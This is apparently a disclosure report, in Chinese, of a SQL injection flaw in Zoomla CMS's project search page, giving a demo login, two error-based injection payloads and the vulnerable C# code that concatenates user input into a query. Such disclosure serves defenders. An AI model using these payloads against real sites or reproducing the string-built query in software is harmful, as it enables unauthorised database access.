### 简要描述:
逐浪cms最新版sql注入
### 详细说明:
访问
```
http://demo.zoomla.cn/User/login.aspx
```
```
test123
```
```
111111
```
登录
然后访问
```
http://demo.zoomla.cn/User/PrintServer/Project/ProjectList.aspx
```
在关键字处输入
```
1' and (select @@version)>0--
```
[<img src="https://images.seebug.org/upload/201408/0521321744074cc59757380f283e02146d746c35.png" alt="73.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/0521321744074cc59757380f283e02146d746c35.png)
点击搜索
[<img src="https://images.seebug.org/upload/201408/05213309339e9a83e45b41f6889c201cadc6a267.png" alt="74.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/05213309339e9a83e45b41f6889c201cadc6a267.png)
输入
```
1' and (select db_name())>0--
```
[<img src="https://images.seebug.org/upload/201408/05213411080a3ea6df28ca62f8d5a1c714dbe36e.png" alt="75.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/05213411080a3ea6df28ca62f8d5a1c714dbe36e.png)
主要代码如下
```
protected void Search_Click(object sender, EventArgs e)
{
string keyWord = this.SearchValue.Text.Trim(); //没处理
int type = DataConverter.CLng(this.DLType.SelectedValue);
DataView defaultView = this.bll.ProjectSearch(type, keyWord).DefaultView; //跟进
this.Egv.DataSource = defaultView;
this.Egv.DataKeyNames = new string[] { "ProjectID" };
this.Egv.DataBind();
}
```
```
public DataTable ProjectSearch(int Type, string KeyWord)
{
string str = string.Empty;
switch (Type)
{
case 0:
str = "ProjectName like '%" + KeyWord + "%'";
break;
case 1:
str = "StartDate like '%" + KeyWord.Trim() + "%'";
break;
case 2:
str = "ProjectID=" + KeyWord;
break;
case 3:
str = "ProjectIntro like '%" + KeyWord + "%'";
break;
case 4:
str = " UserID in (select UserID from ZL_User where UserName like '%" + KeyWord + "%')";
break;
default:
str = "ProjectName like '%" + KeyWord + "%'";
break;
}
string cmdText = "select * from [ZL_Project] where " + str;
return SqlHelper.ExecuteTable(CommandType.Text, cmdText, null);
}
//keyWord存在注入
```
### 漏洞证明:
漏洞证明如上
暂无评论